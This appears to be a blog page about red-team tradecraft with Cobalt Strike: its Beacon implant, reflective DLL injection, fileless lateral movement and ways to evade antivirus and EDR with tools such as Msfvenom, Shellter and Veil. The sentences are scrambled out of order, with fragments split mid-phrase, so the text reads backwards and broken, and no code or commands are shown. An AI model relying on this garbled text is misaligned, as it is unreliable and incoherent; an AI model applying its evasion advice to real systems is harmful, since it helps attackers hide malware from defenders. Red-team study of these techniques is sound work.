I liked the concept however, performing the preparation for such a task was slightly lengthy, therefore my programmer instincts kicked in and I thought why not create some automation. This results in diskless malware execution. Common tooling such as powershell can be used to load the DLL and allows the execution of your choice of methods available within the DLL. NET Dynamic Link Library (DLL) into the memory of the target. Reflective DLL injection involved loading a. I came across a technique called reflective DLL injection and thought it was genius. Following the same idea, I wanted to be able to transfer malware to the target, that would execute in memory and avoid the unnecessary triggering of AV by the fact that it is present on the disk. NET binaries in memory of the target ( execute-assembly), without needing to transfer it. The great thing about Cobalt Strike is the option to execute. In general, uploading binaries onto a target currently is a bit of an unnecessary risk, therefore I wanted to look into ways of performing lateral movement with malware that does not need to be transferred to the disk of the target. Using websites like VirusTotal to test the detection rate of your executables will also likely speed up the process of your malware getting added to a AV signature database. These tools can be successful at performing their task, however if one used the same binary several times there is a good chance it would be added to existing AV/EDR signature databases. These tools also allow you to inject payloads into legitimate software to even better mask your malicious code from the AV. Alternatively, using tools such as Shellter or Veil to create custom Portable Executables (PE) capable of bypassing common anti-virus solutions. It is possible to bypass certain AVs by encoding executables containing payloads with tools such as Msfvenom. Or if you are lucky, you get to pick the brains of talented individuals such as Evading Microsoft Defender – reflective DLL injection / PE Injection These can be learnt through certifications or read about on websites such as MITRE ATT&CK. When creating such tooling it is useful to use the latest researched techniques. Therefore, currently, if trying to remain stealthy while on a red team engagement, it is useful to have your own custom tools that can duck and weave around existing defensive solution such as SIEM, AV and EDR. While Cobalt Strike is extremely useful and allows for an abundance of possibilities, some of the “out-the-box” tooling it provides does not take the current demands of a red team’s Operational Security (OPSEC) into consideration. My colleague, Neil Lines ( wrote a great introductory blog post about Cobalt Strike, which I recommend you read here if you are new to it. For me, it’s best feature is being able to keep an organised view of a victim organization’s network. At a high level, the idea behind a C2 framework is to allow for the management of red team activities. A word about Cobalt Strike C2Ĭobalt Strike is a commercial Command&Control (C2) framework used by many red teams and cyber security consultancies around the world. But considering that Raphael Mudge had already gone there with the Aggressor Script, I needed to do something a little different, so added antivirus evasion on top of it. Reading that post spurred me to make my own DCOM based lateral movement tool for Cobalt Strike. He details scripting an Aggressor Script for Matt Nelson’s MMC20.Application Lateral Movement technique. The Beacon implant has become popular amongst targeted attackers and criminal users as it is well written, stable, and highly customizable.When researching lateral movement techniques I came across a post from Raphael Mudge (of Cobalt Strike fame). Cobalt Strike comes with a toolkit for developing shellcode loaders, called Artifact Kit. It supports C2 and staging over HTTP, HTTPS, DNS, SMB named pipes as well as forward and reverse TCP Beacons can be daisy-chained. Beacon is in-memory/file-less, in that it consists of stageless or multi-stage shellcode that once loaded by exploiting a vulnerability or executing a shellcode loader, will reflectively load itself into the memory of a process without touching the disk. Beacon includes a wealth of functionality to the attacker, including, but not limited to command execution, key logging, file transfer, SOCKS proxying, privilege escalation, mimikatz, port scanning and lateral movement. Cobalt Strike is a paid penetration testing product that allows an attacker to deploy an agent named 'Beacon' on the victim machine.
0 Comments
Leave a Reply. |
Details
AuthorWrite something about yourself. No need to be fancy, just an overview. ArchivesCategories |